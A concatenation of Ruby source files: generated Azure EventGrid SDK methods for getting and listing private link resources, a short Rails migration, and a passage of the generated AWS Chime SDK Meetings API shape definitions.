# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:custom_headers).value!
end
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param private_link_resource_name [String] The name of private link resource.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'parent_type is nil' if parent_type.nil?
fail ArgumentError, 'parent_name is nil' if parent_name.nil?
fail ArgumentError, 'private_link_resource_name is nil' if private_link_resource_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/{parentType}/{parentName}/privateLinkResources/{privateLinkResourceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'parentType' => parent_type,'parentName' => parent_name,'privateLinkResourceName' => private_link_resource_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResource.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PrivateLinkResource>] operation results.
#
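    # @example Rough sketch of a filtered listing (values are illustrative only)
    #   resources = client.private_link_resources.list_by_resource(
    #     'my-resource-group', 'topics', 'my-topic',
    #     filter: "contains(name, 'PATTERN')", top: 20)
    #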
def list_by_resource(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
first_page = list_by_resource_as_lazy(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers)
first_page.get_all_items
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_with_http_info(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
list_by_resource_async(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers).value!
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_async(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'parent_type is nil' if parent_type.nil?
fail ArgumentError, 'parent_name is nil' if parent_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/{parentType}/{parentName}/privateLinkResources'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'parentType' => parent_type,'parentName' => parent_name},
query_params: {'api-version' => @client.api_version,'$filter' => filter,'$top' => top},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResourcesListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PrivateLinkResourcesListResult] operation results.
#
def list_by_resource_next(next_page_link, custom_headers:nil)
response = list_by_resource_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_next_with_http_info(next_page_link, custom_headers:nil)
list_by_resource_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResourcesListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
    # @param parent_name [String] The name of the parent resource (namely, either
    # the topic name or the domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
    # @return [PrivateLinkResourcesListResult] which provides lazy access to pages
# of the response.
#
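    # @example Rough sketch (names are illustrative only); get_all_items on the
    #   returned page walks the remaining pages lazily
    #   page = client.private_link_resources.list_by_resource_as_lazy(
    #     'my-resource-group', 'topics', 'my-topic')
    #   page.get_all_items
    #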
def list_by_resource_as_lazy(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
response = list_by_resource_async(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_resource_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 48.792453 | 224 | 0.705095 |
1d187b139c70157302eca453d4f1422fc2cd877b | 117 | class AddUserIdToJobs < ActiveRecord::Migration[5.0]
def change
add_column :jobs, :user_id, :integer
end
end
| 19.5 | 52 | 0.735043 |
615fc1cf3148530fc28bebc3759c36f4e3e275e4 | 31,816 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::ChimeSDKMeetings
# @api private
module ClientApi
include Seahorse::Model
Arn = Shapes::StringShape.new(name: 'Arn')
Attendee = Shapes::StructureShape.new(name: 'Attendee')
AttendeeList = Shapes::ListShape.new(name: 'AttendeeList')
AudioFeatures = Shapes::StructureShape.new(name: 'AudioFeatures')
BadRequestException = Shapes::StructureShape.new(name: 'BadRequestException')
BatchCreateAttendeeErrorList = Shapes::ListShape.new(name: 'BatchCreateAttendeeErrorList')
BatchCreateAttendeeRequest = Shapes::StructureShape.new(name: 'BatchCreateAttendeeRequest')
BatchCreateAttendeeResponse = Shapes::StructureShape.new(name: 'BatchCreateAttendeeResponse')
Boolean = Shapes::BooleanShape.new(name: 'Boolean')
ClientRequestToken = Shapes::StringShape.new(name: 'ClientRequestToken')
CreateAttendeeError = Shapes::StructureShape.new(name: 'CreateAttendeeError')
CreateAttendeeRequest = Shapes::StructureShape.new(name: 'CreateAttendeeRequest')
CreateAttendeeRequestItem = Shapes::StructureShape.new(name: 'CreateAttendeeRequestItem')
CreateAttendeeRequestItemList = Shapes::ListShape.new(name: 'CreateAttendeeRequestItemList')
CreateAttendeeResponse = Shapes::StructureShape.new(name: 'CreateAttendeeResponse')
CreateMeetingRequest = Shapes::StructureShape.new(name: 'CreateMeetingRequest')
CreateMeetingResponse = Shapes::StructureShape.new(name: 'CreateMeetingResponse')
CreateMeetingWithAttendeesRequest = Shapes::StructureShape.new(name: 'CreateMeetingWithAttendeesRequest')
CreateMeetingWithAttendeesRequestItemList = Shapes::ListShape.new(name: 'CreateMeetingWithAttendeesRequestItemList')
CreateMeetingWithAttendeesResponse = Shapes::StructureShape.new(name: 'CreateMeetingWithAttendeesResponse')
DeleteAttendeeRequest = Shapes::StructureShape.new(name: 'DeleteAttendeeRequest')
DeleteMeetingRequest = Shapes::StructureShape.new(name: 'DeleteMeetingRequest')
EngineTranscribeMedicalSettings = Shapes::StructureShape.new(name: 'EngineTranscribeMedicalSettings')
EngineTranscribeSettings = Shapes::StructureShape.new(name: 'EngineTranscribeSettings')
ExternalMeetingId = Shapes::StringShape.new(name: 'ExternalMeetingId')
ExternalUserId = Shapes::StringShape.new(name: 'ExternalUserId')
ForbiddenException = Shapes::StructureShape.new(name: 'ForbiddenException')
GetAttendeeRequest = Shapes::StructureShape.new(name: 'GetAttendeeRequest')
GetAttendeeResponse = Shapes::StructureShape.new(name: 'GetAttendeeResponse')
GetMeetingRequest = Shapes::StructureShape.new(name: 'GetMeetingRequest')
GetMeetingResponse = Shapes::StructureShape.new(name: 'GetMeetingResponse')
GuidString = Shapes::StringShape.new(name: 'GuidString')
JoinTokenString = Shapes::StringShape.new(name: 'JoinTokenString')
LimitExceededException = Shapes::StructureShape.new(name: 'LimitExceededException')
ListAttendeesRequest = Shapes::StructureShape.new(name: 'ListAttendeesRequest')
ListAttendeesResponse = Shapes::StructureShape.new(name: 'ListAttendeesResponse')
MediaPlacement = Shapes::StructureShape.new(name: 'MediaPlacement')
MediaRegion = Shapes::StringShape.new(name: 'MediaRegion')
Meeting = Shapes::StructureShape.new(name: 'Meeting')
MeetingFeatureStatus = Shapes::StringShape.new(name: 'MeetingFeatureStatus')
MeetingFeaturesConfiguration = Shapes::StructureShape.new(name: 'MeetingFeaturesConfiguration')
NotFoundException = Shapes::StructureShape.new(name: 'NotFoundException')
NotificationsConfiguration = Shapes::StructureShape.new(name: 'NotificationsConfiguration')
ResultMax = Shapes::IntegerShape.new(name: 'ResultMax')
RetryAfterSeconds = Shapes::StringShape.new(name: 'RetryAfterSeconds')
ServiceUnavailableException = Shapes::StructureShape.new(name: 'ServiceUnavailableException')
StartMeetingTranscriptionRequest = Shapes::StructureShape.new(name: 'StartMeetingTranscriptionRequest')
StopMeetingTranscriptionRequest = Shapes::StructureShape.new(name: 'StopMeetingTranscriptionRequest')
String = Shapes::StringShape.new(name: 'String')
TranscribeContentIdentificationType = Shapes::StringShape.new(name: 'TranscribeContentIdentificationType')
TranscribeContentRedactionType = Shapes::StringShape.new(name: 'TranscribeContentRedactionType')
TranscribeLanguageCode = Shapes::StringShape.new(name: 'TranscribeLanguageCode')
TranscribeLanguageModelName = Shapes::StringShape.new(name: 'TranscribeLanguageModelName')
TranscribeMedicalContentIdentificationType = Shapes::StringShape.new(name: 'TranscribeMedicalContentIdentificationType')
TranscribeMedicalLanguageCode = Shapes::StringShape.new(name: 'TranscribeMedicalLanguageCode')
TranscribeMedicalRegion = Shapes::StringShape.new(name: 'TranscribeMedicalRegion')
TranscribeMedicalSpecialty = Shapes::StringShape.new(name: 'TranscribeMedicalSpecialty')
TranscribeMedicalType = Shapes::StringShape.new(name: 'TranscribeMedicalType')
TranscribePartialResultsStability = Shapes::StringShape.new(name: 'TranscribePartialResultsStability')
TranscribePiiEntityTypes = Shapes::StringShape.new(name: 'TranscribePiiEntityTypes')
TranscribeRegion = Shapes::StringShape.new(name: 'TranscribeRegion')
TranscribeVocabularyFilterMethod = Shapes::StringShape.new(name: 'TranscribeVocabularyFilterMethod')
TranscriptionConfiguration = Shapes::StructureShape.new(name: 'TranscriptionConfiguration')
UnauthorizedException = Shapes::StructureShape.new(name: 'UnauthorizedException')
UnprocessableEntityException = Shapes::StructureShape.new(name: 'UnprocessableEntityException')
Attendee.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "ExternalUserId"))
Attendee.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, location_name: "AttendeeId"))
Attendee.add_member(:join_token, Shapes::ShapeRef.new(shape: JoinTokenString, location_name: "JoinToken"))
Attendee.struct_class = Types::Attendee
AttendeeList.member = Shapes::ShapeRef.new(shape: Attendee)
AudioFeatures.add_member(:echo_reduction, Shapes::ShapeRef.new(shape: MeetingFeatureStatus, location_name: "EchoReduction"))
AudioFeatures.struct_class = Types::AudioFeatures
BadRequestException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
BadRequestException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
BadRequestException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
BadRequestException.struct_class = Types::BadRequestException
BatchCreateAttendeeErrorList.member = Shapes::ShapeRef.new(shape: CreateAttendeeError)
BatchCreateAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
BatchCreateAttendeeRequest.add_member(:attendees, Shapes::ShapeRef.new(shape: CreateAttendeeRequestItemList, required: true, location_name: "Attendees"))
BatchCreateAttendeeRequest.struct_class = Types::BatchCreateAttendeeRequest
BatchCreateAttendeeResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
BatchCreateAttendeeResponse.add_member(:errors, Shapes::ShapeRef.new(shape: BatchCreateAttendeeErrorList, location_name: "Errors"))
BatchCreateAttendeeResponse.struct_class = Types::BatchCreateAttendeeResponse
CreateAttendeeError.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "ExternalUserId"))
CreateAttendeeError.add_member(:error_code, Shapes::ShapeRef.new(shape: String, location_name: "ErrorCode"))
CreateAttendeeError.add_member(:error_message, Shapes::ShapeRef.new(shape: String, location_name: "ErrorMessage"))
CreateAttendeeError.struct_class = Types::CreateAttendeeError
CreateAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
CreateAttendeeRequest.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, required: true, location_name: "ExternalUserId"))
CreateAttendeeRequest.struct_class = Types::CreateAttendeeRequest
CreateAttendeeRequestItem.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, required: true, location_name: "ExternalUserId"))
CreateAttendeeRequestItem.struct_class = Types::CreateAttendeeRequestItem
CreateAttendeeRequestItemList.member = Shapes::ShapeRef.new(shape: CreateAttendeeRequestItem)
CreateAttendeeResponse.add_member(:attendee, Shapes::ShapeRef.new(shape: Attendee, location_name: "Attendee"))
CreateAttendeeResponse.struct_class = Types::CreateAttendeeResponse
CreateMeetingRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "ClientRequestToken", metadata: {"idempotencyToken"=>true}))
CreateMeetingRequest.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, required: true, location_name: "MediaRegion"))
CreateMeetingRequest.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
CreateMeetingRequest.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, required: true, location_name: "ExternalMeetingId"))
CreateMeetingRequest.add_member(:notifications_configuration, Shapes::ShapeRef.new(shape: NotificationsConfiguration, location_name: "NotificationsConfiguration"))
CreateMeetingRequest.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
CreateMeetingRequest.struct_class = Types::CreateMeetingRequest
CreateMeetingResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
CreateMeetingResponse.struct_class = Types::CreateMeetingResponse
CreateMeetingWithAttendeesRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "ClientRequestToken", metadata: {"idempotencyToken"=>true}))
CreateMeetingWithAttendeesRequest.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, required: true, location_name: "MediaRegion"))
CreateMeetingWithAttendeesRequest.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
CreateMeetingWithAttendeesRequest.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, required: true, location_name: "ExternalMeetingId"))
CreateMeetingWithAttendeesRequest.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
CreateMeetingWithAttendeesRequest.add_member(:notifications_configuration, Shapes::ShapeRef.new(shape: NotificationsConfiguration, location_name: "NotificationsConfiguration"))
CreateMeetingWithAttendeesRequest.add_member(:attendees, Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesRequestItemList, required: true, location_name: "Attendees"))
CreateMeetingWithAttendeesRequest.struct_class = Types::CreateMeetingWithAttendeesRequest
CreateMeetingWithAttendeesRequestItemList.member = Shapes::ShapeRef.new(shape: CreateAttendeeRequestItem)
CreateMeetingWithAttendeesResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
CreateMeetingWithAttendeesResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
CreateMeetingWithAttendeesResponse.add_member(:errors, Shapes::ShapeRef.new(shape: BatchCreateAttendeeErrorList, location_name: "Errors"))
CreateMeetingWithAttendeesResponse.struct_class = Types::CreateMeetingWithAttendeesResponse
DeleteAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
DeleteAttendeeRequest.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "AttendeeId"))
DeleteAttendeeRequest.struct_class = Types::DeleteAttendeeRequest
DeleteMeetingRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
DeleteMeetingRequest.struct_class = Types::DeleteMeetingRequest
EngineTranscribeMedicalSettings.add_member(:language_code, Shapes::ShapeRef.new(shape: TranscribeMedicalLanguageCode, required: true, location_name: "LanguageCode"))
EngineTranscribeMedicalSettings.add_member(:specialty, Shapes::ShapeRef.new(shape: TranscribeMedicalSpecialty, required: true, location_name: "Specialty"))
EngineTranscribeMedicalSettings.add_member(:type, Shapes::ShapeRef.new(shape: TranscribeMedicalType, required: true, location_name: "Type"))
EngineTranscribeMedicalSettings.add_member(:vocabulary_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyName"))
EngineTranscribeMedicalSettings.add_member(:region, Shapes::ShapeRef.new(shape: TranscribeMedicalRegion, location_name: "Region"))
EngineTranscribeMedicalSettings.add_member(:content_identification_type, Shapes::ShapeRef.new(shape: TranscribeMedicalContentIdentificationType, location_name: "ContentIdentificationType"))
EngineTranscribeMedicalSettings.struct_class = Types::EngineTranscribeMedicalSettings
EngineTranscribeSettings.add_member(:language_code, Shapes::ShapeRef.new(shape: TranscribeLanguageCode, required: true, location_name: "LanguageCode"))
EngineTranscribeSettings.add_member(:vocabulary_filter_method, Shapes::ShapeRef.new(shape: TranscribeVocabularyFilterMethod, location_name: "VocabularyFilterMethod"))
EngineTranscribeSettings.add_member(:vocabulary_filter_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyFilterName"))
EngineTranscribeSettings.add_member(:vocabulary_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyName"))
EngineTranscribeSettings.add_member(:region, Shapes::ShapeRef.new(shape: TranscribeRegion, location_name: "Region"))
EngineTranscribeSettings.add_member(:enable_partial_results_stabilization, Shapes::ShapeRef.new(shape: Boolean, location_name: "EnablePartialResultsStabilization"))
EngineTranscribeSettings.add_member(:partial_results_stability, Shapes::ShapeRef.new(shape: TranscribePartialResultsStability, location_name: "PartialResultsStability"))
EngineTranscribeSettings.add_member(:content_identification_type, Shapes::ShapeRef.new(shape: TranscribeContentIdentificationType, location_name: "ContentIdentificationType"))
EngineTranscribeSettings.add_member(:content_redaction_type, Shapes::ShapeRef.new(shape: TranscribeContentRedactionType, location_name: "ContentRedactionType"))
EngineTranscribeSettings.add_member(:pii_entity_types, Shapes::ShapeRef.new(shape: TranscribePiiEntityTypes, location_name: "PiiEntityTypes"))
EngineTranscribeSettings.add_member(:language_model_name, Shapes::ShapeRef.new(shape: TranscribeLanguageModelName, location_name: "LanguageModelName"))
EngineTranscribeSettings.struct_class = Types::EngineTranscribeSettings
ForbiddenException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
ForbiddenException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
ForbiddenException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
ForbiddenException.struct_class = Types::ForbiddenException
GetAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
GetAttendeeRequest.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "AttendeeId"))
GetAttendeeRequest.struct_class = Types::GetAttendeeRequest
GetAttendeeResponse.add_member(:attendee, Shapes::ShapeRef.new(shape: Attendee, location_name: "Attendee"))
GetAttendeeResponse.struct_class = Types::GetAttendeeResponse
GetMeetingRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
GetMeetingRequest.struct_class = Types::GetMeetingRequest
GetMeetingResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
GetMeetingResponse.struct_class = Types::GetMeetingResponse
LimitExceededException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
LimitExceededException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
LimitExceededException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
LimitExceededException.struct_class = Types::LimitExceededException
ListAttendeesRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
ListAttendeesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location: "querystring", location_name: "next-token"))
ListAttendeesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: ResultMax, location: "querystring", location_name: "max-results"))
ListAttendeesRequest.struct_class = Types::ListAttendeesRequest
ListAttendeesResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
ListAttendeesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "NextToken"))
ListAttendeesResponse.struct_class = Types::ListAttendeesResponse
MediaPlacement.add_member(:audio_host_url, Shapes::ShapeRef.new(shape: String, location_name: "AudioHostUrl"))
MediaPlacement.add_member(:audio_fallback_url, Shapes::ShapeRef.new(shape: String, location_name: "AudioFallbackUrl"))
MediaPlacement.add_member(:signaling_url, Shapes::ShapeRef.new(shape: String, location_name: "SignalingUrl"))
MediaPlacement.add_member(:turn_control_url, Shapes::ShapeRef.new(shape: String, location_name: "TurnControlUrl"))
